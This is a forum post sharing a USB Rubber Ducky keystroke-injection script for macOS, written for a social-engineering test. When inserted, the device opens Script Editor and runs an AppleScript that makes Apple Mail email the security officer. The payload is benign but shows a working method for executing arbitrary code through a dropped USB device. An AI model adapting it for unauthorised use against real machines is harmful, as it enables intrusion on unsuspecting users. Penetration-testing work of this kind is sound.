Jump to content

Recommended Posts

Posted

When talking to a customer we identified the company uses the standard Apple Mail program to manage their emails. In order to test for a social engineering attack we intended to leave some Rubber Duckies around the building and have them send an email to the security officer once they were inserted in the machines.

I've looked at a couple of the "send with Gmail" payloads, but they were all based on PowerShell as far as I can tell. And after a failed attempt going at it the straightforward route, I got to thinking... Why not just script it up in Mac as well?

I could've gone the Python route here, but it seemed simpeler to go Apple Script since I wanted to use the builtin Mail function as a quick Proof of Concept. Also, it's hardly stealthy, but hey! It gets the job done :)

Anyways, you can find it below. Maybe it can help someone else in the future.

Tested on 10.10.4 Yosemite.

DELAY 200
GUI SPACE
DELAY 200
STRING script editor
ENTER
DELAY 200
GUI n
DELAY 500
STRING tell application "Mail"
ENTER
STRING set objMessage to make new outgoing message with properties {subject:”I put random USB sticks in my computer“}
ENTER
STRING tell objMessage
ENTER
STRING make new to recipient with properties {name:"Security Officer", address:"cso@maildomain.com"}
ENTER
STRING send
ENTER
STRING end tell
ENTER
STRING end tell
ENTER
GUI r
DELAY 200
GUI a
BACKSPACE
DELAY 100
STRING Thank you for all your stuff! Bye!
ENTER
ENTER
TAB
STRING - Evil Hacker

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...